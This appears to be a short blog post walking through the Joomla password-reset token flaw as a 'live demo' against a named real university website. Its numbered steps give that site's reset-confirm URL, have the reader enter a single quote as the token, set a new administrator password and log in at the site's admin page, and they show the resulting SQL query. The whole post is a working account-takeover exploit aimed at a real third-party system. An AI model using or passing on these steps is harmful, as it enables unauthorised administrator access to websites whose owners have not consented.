Joomla Password Reset vulnerability : Explain with Live demo :
The tricks is like this:
1. Go to http://miit.unikl.edu.my/index.php?option=com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose already sent to your email,
2. Now, put a single quote ' into field text box "token" and Click OK.The sql query then will be looks like this : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "3. Write new password for admin 4. Go to url : http://miit.unikl.edu.my/administrator/ 5. Login admin with your new password
0 comments:
Post a Comment